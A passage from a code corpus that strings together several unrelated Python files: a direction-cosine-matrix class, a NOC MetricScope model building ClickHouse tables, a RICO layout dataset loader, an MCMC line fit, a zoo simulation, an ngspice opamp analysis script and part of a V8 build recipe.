kwargs[key] if (issubclass(type(rowcol),str)): if (rowcol.lower() != 'columns'): raise ValueError('direction must be either "rows" or "columns"') else: rowcol = 'rows' if (rowcol == 'columns'): d = d[:,:,(0, 3, 6, 1, 4, 7, 2, 5, 8)] d = d.reshape([t,3,3]) else: raise dimError else: raise TypeError('Input must be derived from list, np.array, dcm, or quaternion') return d def __repr__(self): s = repr(self.__array__()).replace('array', 'dcm') # now, 'dcm' has 3 letters, and 'array' 5, so the columns don't # line up anymore. We need to remove two spaces l = s.splitlines() for i in range(1, len(l)): if l[i]: l[i] = l[i][2:] return '\n'.join(l) ''' transpose - a DCM transpose that follows our stacking rules NOTE: Can also use the ~ operator (inverse) ''' def transpose(self): # If the user sliced off the t (sequence) axis we need to # only transpose the axes present in the correct order if (len(self.shape) < 3): return super(dcm,self).transpose().view(dcm) else: return super(dcm,self).transpose(0, 2, 1).view(dcm) ''' det - determinant of dcm Necessary but not sufficient condition is that abs(det(dcm)) = 1 [[a b c] [d e f] [g h i]] det = aei + bfg + cdh - ceg - bdi - afh ''' def det(self): if (len(self.shape) < 3): return (self[0,0]*self[1,1]*self[2,2] + self[0,1]*self[1,2]*self[2,0] + self[0,2]*self[1,0]*self[2,1] - self[0,2]*self[1,1]*self[2,0] - self[0,1]*self[1,0]*self[2,2] - self[0,0]*self[1,2]*self[2,1]) else: return (self[:,0,0]*self[:,1,1]*self[:,2,2].view(np.ndarray) + self[:,0,1]*self[:,1,2]*self[:,2,0].view(np.ndarray) + self[:,0,2]*self[:,1,0]*self[:,2,1].view(np.ndarray) - self[:,0,2]*self[:,1,1]*self[:,2,0].view(np.ndarray) - self[:,0,1]*self[:,1,0]*self[:,2,2].view(np.ndarray) - self[:,0,0]*self[:,1,2]*self[:,2,1].view(np.ndarray)) ''' diagonal - return the diagonal of each DCM as an array ''' def diagonal(self): if (len(self.shape) < 3): return np.array((self[0,0], self[1,1], self[2,2])) else: return np.array((self[:,0,0], self[:,1,1], self[:,2,2])) ''' trace - sum of diagonal ''' def trace(self): return sum(self.diagonal()) ''' orthonormal - returns True for each DCM in a stack that is sufficiently orthogonal and normal as determined by the rss of the associated quaternion being sufficiently close to 1.0 Default tolerance is 1e-9 ''' def orthonormal(self,tolerance=1.0e-9): # The simplest thing to do is let the quaternion do the work # Not sure if this is the fastest way, but it is the easiest return Quaternion.quaternion(self).orthonormal() # ------------------------------------------------------------------- # Operator Overloads # # Returns NotImplemented 
for anything that does not make sense # ------------------------------------------------------------------- ''' object.__add__(self, other) + ''' def __add__(self,b): return NotImplemented ''' object.__sub__(self, other) - ''' def __sub__(self,b): return NotImplemented ''' object.__mul__(self, other) * ''' def __mul__(self,b): return self.__matmul__(b) ''' object.__matmul__(self, other) @ ''' def __matmul__(self, b): inType = type(b) if (issubclass(inType,dcm)): return np.matmul(self,b).view(dcm) elif (issubclass(inType,list) or issubclass(inType,np.ndarray)): # TODO: Need to implement matric vector logic return NotImplemented else: raise TypeError('Target type must be a dcm') ''' object.__truediv__(self, other) / ''' def __truediv__(self,b): return NotImplemented ''' object.__floordiv__(self, other) // ''' def __floordiv__(self,b): return NotImplemented ''' object.__mod__(self, other) % ''' def __mod__(self,b): return NotImplemented ''' object.__divmod__(self, other) divmod() ''' def __divmod__(self,b): return NotImplemented ''' object.__pow__(self, other[, modulo]) pow(), ** ''' def __pow__(self,b,*args): return NotImplemented ''' object.__lshift__(self, other) << ''' def __lshift__(self,b): return NotImplemented ''' object.__rshift__(self, other) >> ''' def __rshift__(self,b): return NotImplemented ''' object.__and__(self, other) & ''' def __and__(self,b): return NotImplemented ''' object.__xor__(self, other) ^ ''' def __xor__(self,b): return NotImplemented ''' object.__or__(self, other) | ''' def __or__(self,b): return NotImplemented ''' Backup functions when left side is not of the correct type object.__radd__(self, other) + ''' def __radd__(self,b): return NotImplemented ''' object.__rsub__(self, other) - ''' def __rsub__(self,b): return NotImplemented ''' object.__rmul__(self, other) * ''' def __rmul__(self,b): return NotImplemented ''' object.__rmatmul__(self, other) @ ''' def __rmatmul__(self,b): return NotImplemented ''' object.__rtruediv__(self, other) / ''' def __rtruediv__(self,b): return NotImplemented ''' object.__rfloordiv__(self, other) // ''' def __rfloordiv__(self,b): return NotImplemented ''' object.__rmod__(self, other) % ''' def __rmod__(self,b): return NotImplemented ''' object.__rdivmod__(self, other) divmod() ''' def __rdivmod__(self,b): return NotImplemented ''' object.__rpow__(self, other) pow(), ** ''' def __rpow__(self,b): return NotImplemented ''' object.__rlshift__(self, other) << ''' def __rlshift__(self,b): return NotImplemented ''' object.__rrshift__(self, other) >> ''' def __rrshift__(self,b): return NotImplemented ''' object.__rand__(self, other) & ''' def __rand__(self,b): return NotImplemented ''' object.__rxor__(self, other) ^ ''' def __rxor__(self,b): return NotImplemented ''' object.__ror__(self, other) | ''' def __ror__(self,b): return NotImplemented ''' object.__iadd__(self, other) += ''' def __iadd__(self,b): return NotImplemented ''' object.__isub__(self, other) -= ''' def __isub__(self,b): return NotImplemented ''' object.__imul__(self, other) *= ''' def __imul__(self,b): return NotImplemented ''' object.__imatmul__(self, other) @= ''' def __imatmul__(self,b): return NotImplemented ''' object.__itruediv__(self, other) /= ''' def __itruediv__(self,b): return NotImplemented ''' object.__ifloordiv__(self, other) //= ''' def __ifloordiv__(self,b): return NotImplemented ''' object.__imod__(self, other) %= ''' def __imod__(self,b): return NotImplemented ''' object.__ipow__(self, other[, modulo]) **= ''' def __ipow__(self,b,*args): return 
NotImplemented ''' object.__ilshift__(self, other) <<= ''' def __ilshift__(self,b): return NotImplemented ''' object.__irshift__(self, other) >>= ''' def __irshift__(self,b): return NotImplemented ''' object.__iand__(self, other) &= ''' def __iand__(self,b): return NotImplemented ''' object.__ixor__(self, other) ^= ''' def __ixor__(self,b): return NotImplemented ''' object.__ior__(self, other) |= ''' def __ior__(self,b): return NotImplemented ''' object.__neg__(self) - ''' # Use superclass ''' object.__pos__(self) + ''' # Use superclass ''' object.__abs__(self) abs() ''' def __abs__(self): return NotImplemented ''' object.__invert__(self) ~ ''' def __invert__(self): return self.transpose() ''' object.__complex__(self) complex() ''' def __complex__(self): return NotImplemented ''' object.__int__(self) int() ''' def __int__(self): return NotImplemented ''' object.__float__(self) float() ''' def __float__(self): return NotImplemented ''' object.__round__(self[, n]) round() ''' def __round__(self, *args): return NotImplemented ''' object.__index__(self) operator.index() ''' # Use superclass
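
# Editor's note: a minimal usage sketch (not part of the original module),
# following the constructor docstring above. For reference only; never called.
def _dcm_usage_example():
    m = dcm()          # defaults to a single stacked 3x3 identity DCM
    print(m.det())     # determinant of each stacked DCM (1.0 for the identity)
    print(~m)          # ~ gives the transpose, i.e. the inverse of a proper DCM
    print((~m) * m)    # composes back to the identity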
nilq/baby-python
python
# -*- coding: utf-8 -*- # --------------------------------------------------------------------- # MetricScope model # --------------------------------------------------------------------- # Copyright (C) 2007-2019 The NOC Project # See LICENSE for details # --------------------------------------------------------------------- # Python modules from __future__ import absolute_import, print_function import operator from threading import Lock # Third-party modules import six from mongoengine.document import Document, EmbeddedDocument from mongoengine.fields import ( StringField, ListField, EmbeddedDocumentField, UUIDField, BooleanField, ) import cachetools # NOC Modules from noc.config import config from noc.core.prettyjson import to_json from noc.core.model.decorator import on_delete_check id_lock = Lock() @six.python_2_unicode_compatible class KeyField(EmbeddedDocument): # Table field name field_name = StringField() # Model reference, i.e. sa.ManagedObject model = StringField() def __str__(self): return self.field_name def to_json(self): return {"field_name": self.field_name, "model": self.model} @property def field_type(self): return "UInt64" @six.python_2_unicode_compatible class PathItem(EmbeddedDocument): name = StringField() is_required = BooleanField() # Default value, when empty default_value = StringField() def __str__(self): return self.name def to_json(self): v = {"name": self.name, "is_required": bool(self.is_required)} if self.default_value: v["default_value"] = self.default_value return v @on_delete_check(check=[("pm.MetricType", "scope")]) @six.python_2_unicode_compatible class MetricScope(Document): meta = { "collection": "noc.metricscopes", "strict": False, "auto_create_index": False, "json_collection": "pm.metricscopes", "json_unique_fields": ["name"], } name = StringField(unique=True) uuid = UUIDField(binary=True) # Database table name table_name = StringField() description = StringField(required=False) key_fields = ListField(EmbeddedDocumentField(KeyField)) path = ListField(EmbeddedDocumentField(PathItem)) enable_timedelta = BooleanField(default=False) _id_cache = cachetools.TTLCache(maxsize=100, ttl=60) def __str__(self): return self.name @classmethod @cachetools.cachedmethod(operator.attrgetter("_id_cache"), lock=lambda _: id_lock) def get_by_id(cls, id): return MetricScope.objects.filter(id=id).first() @property def json_data(self): r = { "name": self.name, "$collection": self._meta["json_collection"], "uuid": self.uuid, "table_name": self.table_name, "description": self.description, "key_fields": [kf.to_json() for kf in self.key_fields], "path": [p.to_json() for p in self.path], "enable_timedelta": self.enable_timedelta, } return r def to_json(self): return to_json( self.json_data, order=[ "name", "$collection", "uuid", "table_name", "description", "key_fields", "path", ], ) def get_json_path(self): return "%s.json" % self.name def iter_fields(self): """ Yield (field_name, field_type) tuples :return: """ from .metrictype import MetricType yield "date", "Date" yield "ts", "DateTime" for f in self.key_fields: yield f.field_name, f.field_type if self.path: yield "path", "Array(String)" if self.enable_timedelta: yield "time_delta", "UInt16" for t in MetricType.objects.filter(scope=self.id).order_by("id"): yield (t.field_name, t.field_type) def get_create_sql(self): """ Get CREATE TABLE SQL statement :return: """ pk = [f.field_name for f in self.key_fields] if self.path: pk += ["path"] pk += ["ts"] r = [ "CREATE TABLE IF NOT EXISTS %s (" % self._get_raw_db_table(), 
",\n".join(" %s %s" % (n, t) for n, t in self.iter_fields()), ") ENGINE = MergeTree(date, (%s), 8192)" % ", ".join(pk), ] return "\n".join(r) def get_create_distributed_sql(self): """ Get CREATE TABLE for Distributed engine :return: """ return ( "CREATE TABLE IF NOT EXISTS %s " "AS %s " "ENGINE = Distributed(%s, %s, %s)" % ( self.table_name, self._get_raw_db_table(), config.clickhouse.cluster, config.clickhouse.db, self._get_raw_db_table(), ) ) def _get_raw_db_table(self): if config.clickhouse.cluster: return "raw_%s" % self.table_name else: return self.table_name def ensure_table(self, connect=None): """ Ensure table is exists :return: True, if table has been changed """ from noc.core.clickhouse.connect import connection def ensure_columns(table_name): c = False # Alter when necessary existing = {} for name, type in ch.execute( """ SELECT name, type FROM system.columns WHERE database=%s AND table=%s """, [config.clickhouse.db, table_name], ): existing[name] = type after = None for f, t in self.iter_fields(): if f not in existing: ch.execute( post="ALTER TABLE %s ADD COLUMN %s %s AFTER %s" % (table_name, f, t, after) ) c = True after = f if f in existing and existing[f] != t: print("Warning! Type mismatch for column %s: %s <> %s" % (f, existing[f], t)) print( "Set command manually: ALTER TABLE %s MODIFY COLUMN %s %s" % (table_name, f, t) ) return c changed = False ch = connect or connection(read_only=False) if not ch.has_table(self._get_raw_db_table()): # Create new table ch.execute(post=self.get_create_sql()) changed = True else: changed |= ensure_columns(self._get_raw_db_table()) # Check for distributed table if config.clickhouse.cluster: if not ch.has_table(self.table_name): ch.execute(post=self.get_create_distributed_sql()) changed = True else: changed |= ensure_columns(self.table_name) return changed
nilq/baby-python
python
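# A minimal sketch of the CREATE TABLE statement that MetricScope.get_create_sql()
# in the module above assembles. The scope name, field list and primary key here are
# hypothetical stand-ins; the real ones come from iter_fields() and key_fields.
if __name__ == "__main__":
    fields = [("date", "Date"), ("ts", "DateTime"), ("managed_object", "UInt64"),
              ("path", "Array(String)"), ("load_in", "UInt64")]
    pk = ["managed_object", "path", "ts"]
    sql = "\n".join([
        "CREATE TABLE IF NOT EXISTS raw_interface (",
        ",\n".join(" %s %s" % (n, t) for n, t in fields),
        ") ENGINE = MergeTree(date, (%s), 8192)" % ", ".join(pk),
    ])
    print(sql)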
import os import pickle import random import torch import numpy as np import math from torch.utils.data import Dataset class RicoDataset(Dataset): ''' dataset Loader for rico ''' def __init__(self, data_path, debug=False ) -> None: super().__init__() self.data_path = data_path self.debug = debug self.data = [] max_len = -1 ''' load data from file''' with open(self.data_path, 'rb+') as f: # data_temp = pickle.load(f) # max_len = -1 # for layout in data_temp: # batch_data = [] # max_len = max(max_len, len(layout['label']) * 5) # for i in range(len(layout['label'])): # batch_data.append((layout['label'][i])) # batch_data.append((math.ceil(layout['box'][i][0] * 127))) # x1 # batch_data.append((math.ceil(layout['box'][i][1] * 127))) # y1 # batch_data.append((math.ceil((layout['box'][i][2]- layout['box'][i][0]) * 127))) # w # batch_data.append((math.ceil((layout['box'][i][3]- layout['box'][i][1]) * 127))) # h # self.data.append(batch_data) # # padding layout # for i in range(len(self.data)): # if len(self.data[i]) < max_len: # for j in range(max_len - len(self.data[i])): # self.data[i].append(-1) # self.data = np.array(self.data) data_temp = pickle.load(f) for layout in data_temp: batch_data = '' for i in range(len(layout['label'])): batch_data = batch_data + ' ' + str((layout['label'][i])) + ' ' + \ str(math.ceil(layout['box'][i][0] * 127)) + ' ' + str(math.ceil(layout['box'][i][1] * 127)) + ' ' + \ str(math.ceil(layout['box'][i][2] * 127) - math.ceil(layout['box'][i][0] * 127)) + ' ' + \ str(math.ceil(layout['box'][i][3] * 127) - math.ceil(layout['box'][i][1] * 127)) self.data.append(batch_data.lstrip().rstrip()) if debug: self.data = self.data[:100] def __getitem__(self, index): return self.data[index] def __len__(self): return len(self.data) if __name__ == '__main__': data_loader = RicoDataset(data_path='./dataset/RICO.pkl') print(data_loader.__getitem__(0)) print(data_loader.__getitem__(1))
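# A small illustration (hypothetical layout record) of the string each sample becomes:
# "label x1 y1 w h ..." with coordinates quantized to a 0-127 grid, mirroring the
# construction in RicoDataset.__init__ above.
if __name__ == '__main__':
    demo_layout = {'label': [1, 3], 'box': [[0.0, 0.0, 0.5, 0.5], [0.25, 0.25, 1.0, 1.0]]}
    tokens = ''
    for i in range(len(demo_layout['label'])):
        x1 = math.ceil(demo_layout['box'][i][0] * 127)
        y1 = math.ceil(demo_layout['box'][i][1] * 127)
        w = math.ceil(demo_layout['box'][i][2] * 127) - x1
        h = math.ceil(demo_layout['box'][i][3] * 127) - y1
        tokens += ' {} {} {} {} {}'.format(demo_layout['label'][i], x1, y1, w, h)
    print(tokens.strip())   # "1 0 0 64 64 3 32 32 95 95"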
nilq/baby-python
python
import numpy as np import scipy.stats as stats import matplotlib.pyplot as plt import scipy.optimize as opt import emcee import triangle, walkers import priors np.random.seed(666) def randomData(a, b, sig, npts = 100): x = np.random.random(npts) mean = a + b * x y = stats.norm(loc=mean, scale=sig).rvs(size=mean.shape) return x, y if __name__ == "__main__": aTrue = 7.1 bTrue = 10.0 sigTrue = np.sqrt(2.0) aGuess = 6.9 bGuess = 10.5 sigGuess = np.sqrt(1.8) x, y = randomData(aTrue, bTrue, sigTrue) yerrTrue = sigTrue*np.ones_like(x) sigPrior = priors.HalfCauchyPrior(0, 0.1) # Step 5: MCMC modeling, unknown errors, prior on sigma def chi2(params, *args): a, b, sigma = params xf, yf = args prediction = a + b * xf chi2 = np.sum( (prediction - yf)**2 / sigma**2 ) chi2 += np.log(2 * np.pi * sigma**2) return chi2 def lnprior(params): a, b, sigma = params #if sigma < 1e-10 or sigma > 10: # return -np.inf #return 0.0 return sigPrior.lnlike(sigma) def lnlike(params, *args): lp = lnprior(params) if not np.isfinite(lp): return -np.inf return -0.5 * chi2(params, *args) + lp result = opt.minimize(chi2, [aGuess, bGuess, sigGuess], args=(x, y), method="BFGS") print "Nonlinear fit, no errors" print " a' = %.3f +/- %.3f" % (result.x[0], np.sqrt(result.hess_inv[0][0])) print " b' = %.3f +/- %.3f" % (result.x[1], np.sqrt(result.hess_inv[1][1])) print " sig' = %.3f +/- %.3f" % (result.x[2], np.sqrt(result.hess_inv[2][2])) ndim, nwalkers, nburn, nstep = 3, 100, 1000, 10000 pos = [np.array((aGuess, bGuess, sigGuess)) + 1e-4*np.random.randn(ndim) for i in range(nwalkers)] sampler = emcee.EnsembleSampler(nwalkers, ndim, lnlike, args=(x, y)) pos, prob, state = sampler.run_mcmc(pos, nburn) sampler.reset() pos, prob, state = sampler.run_mcmc(pos, nstep, rstate0=state) fig = plt.figure() sp = fig.add_subplot(111) sp.errorbar(x, y, yerr=yerrTrue, fmt="ro") sp.plot(x, aTrue + bTrue * x, "r-") flatchain = sampler.flatchain print "MCMC analysis" flata = flatchain[:,0] flatb = flatchain[:,1] flatsig = flatchain[:,2] print " a = %.3f +%.3f -%.3f" % (np.percentile(flata, 50), np.percentile(flata, 50)-np.percentile(flata, 50-68.27/2), np.percentile(flata, 50+68.27/2)-np.percentile(flata, 50), ) print " b = %.3f +%.3f -%.3f" % (np.percentile(flatb, 50), np.percentile(flatb, 50)-np.percentile(flatb, 50-68.27/2), np.percentile(flatb, 50+68.27/2)-np.percentile(flatb, 50), ) print " sig = %.3f +%.3f -%.3f" % (np.percentile(flatsig, 50), np.percentile(flatsig, 50)-np.percentile(flatsig, 50-68.27/2), np.percentile(flatsig, 50+68.27/2)-np.percentile(flatsig, 50), ) for a, b in flatchain[np.random.randint(len(flatchain), size=100)][:,:2]: sp.plot(x, a + b*x, color="k", alpha=0.05) triangle.triangle(flatchain, ("a", "b", "sig")) walkers.walkers(sampler.chain, ("a", "b", "sig")) plt.show()
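# A minimal reference sketch (not used by the script above) of the Gaussian negative
# log-likelihood being sampled; names mirror the script. Note that the
# ln(2*pi*sigma^2) normalization enters once per data point when sigma is a free
# parameter, i.e.
#   -2 ln L = sum_i (y_i - a - b*x_i)**2 / sigma**2 + N * ln(2*pi*sigma**2)
def neg2_log_likelihood(params, x, y):
    a, b, sigma = params
    resid = y - (a + b * x)
    return np.sum(resid**2) / sigma**2 + x.size * np.log(2 * np.pi * sigma**2)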
nilq/baby-python
python
import os from Zoo.World import World from Zoo.Position import Position from Zoo.Organisms.Grass import Grass from Zoo.Organisms.Sheep import Sheep from Zoo.Organisms.Dandelion import Dandelion from Zoo.Organisms.Wolf import Wolf from Zoo.Organisms.Toadstool import Toadstool if __name__ == '__main__': pyWorld = World(8, 8) newOrg = Grass(position=Position(xPosition=4, yPosition=0), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Sheep(position=Position(xPosition=0, yPosition=0), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Dandelion(position=Position(xPosition=0, yPosition=4), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Wolf(position=Position(xPosition=7, yPosition=7), world=pyWorld) pyWorld.addOrganism(newOrg) newOrg = Toadstool(position=Position(xPosition=4, yPosition=4), world=pyWorld) pyWorld.addOrganism(newOrg) print(pyWorld) for _ in range(0, 10): input('') os.system('cls') pyWorld.makeTurn() print(pyWorld)
nilq/baby-python
python
# -*- coding: utf-8 -*- #!/usr/bin/env python3 import os import re import time import random import fileinput import math import pandas as pd import numpy as np import matplotlib.pyplot as plt from spyci import spyci def write_spice(sch_path, file_name, corner): extension = '.spice' lines = ["\n* Parameters\n", ".param iref = 100u\n", ".param vdd = 1.8\n", ".param vss = 0.0\n", ".param vcm = 0.8\n", ".param vac = 10m\n", "\n.options TEMP = 65.0\n", "\n* Models\n", ".lib ~/skywater/skywater-pdk/libraries/sky130_fd_pr_ngspice/latest/models/corners/sky130.lib " + corner + "\n", "\n* Data to save\n", ".save all \n", "\n* Simulation \n", ".control\n", " ac dec 100 1 10G\n" " meas ac GBW when vdb(vout)=0\n" " meas ac DCG find vdb(vout) at=1\n" " meas ac PM find vp(vout) when vdb(vout)=0\n" " print PM*180/PI\n" " set filetype = ascii\n", " write ac_openloop_" + corner + ".raw\n", ".endc\n"] spice_file = open(sch_path + file_name + extension, 'r') contents = spice_file.readlines() spice_file.close() for line in lines: contents.insert(len(contents)-3, str(line)) sim_file = sch_path + file_name + '_sim_' + corner + extension spice_file = open(sim_file, 'w') contents = "".join(contents) spice_file.write(contents) spice_file.close() return sim_file #------------------------------------------------------------------------------ os.system('clear') plt.close('all') #------------------------------------------------------------------------------ spice_command = [] sch_path = 'sch/opamp/' simulator = 'ngspice' options = '-b' inputfile = 'opamp_openloop' rawfile_TT = "ac_openloop_TT.raw" rawfile_FF = "ac_openloop_FF.raw" rawfile_SS = "ac_openloop_SS.raw" corners = ['TT', 'FF', 'SS'] simulation_enable = False if simulation_enable: for corner in corners: sim_file = write_spice(sch_path, inputfile, corner) spice_command = simulator + ' ' + options + ' ' + sim_file os.system(spice_command) ACdataTT = spyci.load_raw(rawfile_TT) ACdataFF = spyci.load_raw(rawfile_FF) ACdataSS = spyci.load_raw(rawfile_SS) data = pd.DataFrame( { "Frequency": [np.real(i) for i in ACdataTT["values"]["frequency"]], "Vout TT": [i for i in ACdataTT["values"]["v(vout)"]], "Vout FF": [i for i in ACdataFF["values"]["v(vout)"]], "Vout SS": [i for i in ACdataSS["values"]["v(vout)"]], "DC Gain TT [dB]": [np.real(i) for i in ACdataTT["values"]["dcg"]], "DC Gain FF [dB]": [np.real(i) for i in ACdataFF["values"]["dcg"]], "DC Gain SS [dB]": [np.real(i) for i in ACdataSS["values"]["dcg"]], "GBW TT [MHz]": [np.real(i)*1e-6 for i in ACdataTT["values"]["gbw"]], "GBW FF [MHz]": [np.real(i)*1e-6 for i in ACdataFF["values"]["gbw"]], "GBW SS [MHz]": [np.real(i)*1e-6 for i in ACdataSS["values"]["gbw"]], "PM TT [degree]": [np.real(i)*180/np.pi for i in ACdataTT["values"]["pm"]], "PM FF [degree]": [np.real(i)*180/np.pi for i in ACdataFF["values"]["pm"]], "PM SS [degree]": [np.real(i)*180/np.pi for i in ACdataSS["values"]["pm"]], } ) data['Mag(Vout) TT [dB]'] = 20*np.log10(np.abs(data['Vout TT'])) data['Mag(Vout) FF [dB]'] = 20*np.log10(np.abs(data['Vout FF'])) data['Mag(Vout) SS [dB]'] = 20*np.log10(np.abs(data['Vout SS'])) data['Ph(Vout) TT [degree]'] = np.arctan2(np.imag(data['Vout TT']),np.real(data['Vout TT']))*180/np.pi data['Ph(Vout) FF [degree]'] = np.arctan2(np.imag(data['Vout FF']),np.real(data['Vout FF']))*180/np.pi data['Ph(Vout) SS [degree]'] = np.arctan2(np.imag(data['Vout SS']),np.real(data['Vout SS']))*180/np.pi fig, ax = plt.subplots(2,1) data.plot(ax=ax[0], x='Frequency', y='Mag(Vout) TT [dB]', logx=True, linewidth='3') data.plot(ax=ax[0], 
x='Frequency', y='Mag(Vout) FF [dB]', logx=True, linewidth='3') data.plot(ax=ax[0], x='Frequency', y='Mag(Vout) SS [dB]', logx=True, linewidth='3') ax[0].grid() ax[0].set_ylabel('Mag [dB]') ax[0].margins(0,0.05) data.plot(ax=ax[1], x='Frequency', y='Ph(Vout) TT [degree]', logx=True, linewidth='3') data.plot(ax=ax[1], x='Frequency', y='Ph(Vout) FF [degree]', logx=True, linewidth='3') data.plot(ax=ax[1], x='Frequency', y='Ph(Vout) SS [degree]', logx=True, linewidth='3') ax[1].grid() ax[1].set_ylabel('Phase [degree]') ax[1].margins(0,0.05) plt.show()
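# A small cross-check (illustrative only) of the GBW value ngspice already measured:
# estimate the unity-gain frequency of the TT corner by interpolating the gain curve.
# Assumes the gain starts above 0 dB and crosses it once within the sweep.
mag_tt = data['Mag(Vout) TT [dB]'].to_numpy()
freq_tt = data['Frequency'].to_numpy()
i = int(np.argmax(mag_tt < 0))   # first sample below 0 dB
f_unity = np.interp(0.0, [mag_tt[i], mag_tt[i - 1]], [freq_tt[i], freq_tt[i - 1]])
print('Estimated GBW [MHz]:', f_unity * 1e-6)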
nilq/baby-python
python
# Copyright 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from recipe_engine.post_process import Filter DEPS = [ 'archive', 'chromium', 'depot_tools/gclient', 'recipe_engine/context', 'recipe_engine/json', 'recipe_engine/path', 'recipe_engine/platform', 'recipe_engine/properties', 'recipe_engine/raw_io', 'recipe_engine/step', 'recipe_engine/url', 'swarming_client', 'recipe_engine/time', 'depot_tools/tryserver', 'v8', ] def RunSteps(api): v8 = api.v8 v8.apply_bot_config(v8.BUILDERS) additional_trigger_properties = {} tests = v8.create_tests() if v8.is_pure_swarming_tester(tests): api.swarming_client.checkout() # Simulate a v8 update on slim swarming testers. The revision # property is mandatory. The commit position is required by gatekeeper. api.step.active_result.presentation.properties['got_revision'] = ( api.properties['revision']) api.step.active_result.presentation.properties['got_revision_cp'] = ( api.properties.get('parent_got_revision_cp')) v8.set_up_swarming() else: # Make sure we don't run a non-pure swarming tester on a subdir slave. # Subdir slaves have the name pattern 'slaveN-c3#M'. assert '#' not in api.properties.get('bot_id', ''), ( 'Can only use pure swarming testers on subdir slaves.') if api.platform.is_win: api.chromium.taskkill() if v8.generate_sanitizer_coverage: # When collecting code coverage, we need to sync to the revision that # fits to the patch for the line numbers to match. if api.properties['patch_storage'] == 'gerrit': revision = v8.calculate_patch_base_gerrit() else: v8.checkout(patch=False) revision = v8.calculate_patch_base_rietveld() update_step = v8.checkout(revision=revision, suffix='with patch base') else: update_step = v8.checkout() update_properties = update_step.json.output['properties'] if update_properties.get('got_swarming_client_revision'): additional_trigger_properties['parent_got_swarming_client_revision'] = ( update_properties['got_swarming_client_revision']) v8.set_up_swarming() if v8.c.mips_cross_compile: v8.setup_mips_toolchain() v8.runhooks() if v8.generate_gcov_coverage: v8.init_gcov_coverage() if v8.should_build: v8.compile() if v8.run_dynamorio: v8.dr_compile() if v8.should_upload_build: v8.upload_build() v8.maybe_create_clusterfuzz_archive(update_step) if v8.should_download_build: v8.download_build() if v8.should_test: test_results = v8.runtests(tests) v8.maybe_bisect(test_results) if not api.tryserver.is_tryserver and test_results.is_negative: # Let the overall build fail for failures and flakes. raise api.step.StepFailure('Failures or flakes in build.') if api.tryserver.is_tryserver and test_results.has_failures: # Let tryjobs fail for failures only. raise api.step.StepFailure('Failures in tryjob.') if v8.generate_gcov_coverage: v8.upload_gcov_coverage_report() v8.maybe_trigger(**additional_trigger_properties) def GenTests(api): for mastername, _, buildername, _ in api.v8.iter_builders(): yield api.v8.test(mastername, buildername) yield ( api.v8.test( 'client.v8.branches', 'V8 Linux - beta branch', 'branch_sync_failure', ) + api.step_data('bot_update', retcode=1) ) yield ( api.v8.test( 'client.v8', 'V8 Linux', 'swarming_collect_failure', ) + api.step_data('Check', retcode=1) ) # Simulate a tryjob triggered by the CQ for setting up different swarming # default tags. 
yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'triggered_by_cq', requester='commit-bot@chromium.org', patch_project='v8', blamelist=['dude@chromium.org'], ) ) # Simulate a tryjob triggered by the tryserver for setting up different # swarming default tags. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'triggered_by_ts', requester='dude@chromium.org', patch_project='v8', blamelist=['dude@chromium.org'], ) ) # Test usage of test filters. They're used when the buildbucket # job gets a property 'testfilter', which is expected to be a json list of # test-filter strings. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'test_filter', ) + api.properties( testfilter=['mjsunit/regression/*', 'test262/foo', 'test262/bar'], extra_flags='--trace_gc --turbo_stats', ) ) # Test extra properties on a builder bot to ensure it triggers the tester # with the right properties. yield ( api.v8.test( 'tryserver.v8', 'v8_win64_rel_ng', 'test_filter_builder', ) + api.properties( testfilter=['mjsunit/regression/*', 'test262/foo', 'test262/bar'], extra_flags='--trace_gc --turbo_stats', ) + api.post_process(Filter('trigger')) ) # Test using extra flags with a bot that already uses some extra flags as # positional argument. yield ( api.v8.test( 'tryserver.v8', 'v8_linux_arm_armv8a_rel', 'positional_extra_flags', ) + api.properties( extra_flags=['--trace_gc', '--turbo_stats'], ) ) yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'failures', ) + api.override_step_data( 'Check', api.v8.output_json(has_failures=True)) ) yield ( api.v8.test( 'tryserver.v8', 'v8_linux_rel_ng_triggered', 'flakes', ) + api.override_step_data( 'Check', api.v8.output_json(has_failures=True, flakes=True)) ) def TestFailures(wrong_results, flakes): results_suffix = "_wrong_results" if wrong_results else "" flakes_suffix = "_flakes" if flakes else "" return ( api.v8.test( 'client.v8', 'V8 Linux64 - internal snapshot', 'test_failures%s%s' % (results_suffix, flakes_suffix), ) + api.override_step_data( 'Check', api.v8.output_json( has_failures=True, wrong_results=wrong_results, flakes=flakes)) ) yield TestFailures(wrong_results=False, flakes=False) yield TestFailures(wrong_results=False, flakes=True) yield ( TestFailures(wrong_results=True, flakes=False) + api.expect_exception('AssertionError') ) yield ( api.v8.test( 'client.v8', 'V8 Linux64 - internal snapshot', 'empty_json', ) + api.override_step_data('Check', api.json.output([])) + api.expect_exception('AssertionError') ) yield ( api.v8.test( 'client.v8', 'V8 Linux64 - internal snapshot', 'one_failure', ) + api.override_step_data('Check', api.v8.one_failure()) ) yield ( api.v8.test( 'client.v8', 'V8 Linux64', 'one_failure_build_env_not_supported', ) + api.override_step_data('Check', api.v8.one_failure()) + api.properties(parent_build_environment=None) ) yield ( api.v8.test( 'client.v8', 'V8 Fuzzer', 'fuzz_archive', ) + api.step_data('Fuzz', retcode=1) ) # Bisect over range a1, a2, a3. Assume a2 is the culprit. Steps: # Bisect a0 -> no failures. # Bisect a2 -> failures. # Bisect a1 -> no failures. # Report culprit a2. yield ( api.v8.test( 'client.v8', 'V8 Linux - predictable', 'bisect', ) + api.v8.fail('Mjsunit') + api.v8.fail('Bisect a2.Retry') + api.time.step(120) ) # The same as above, but overriding changes. 
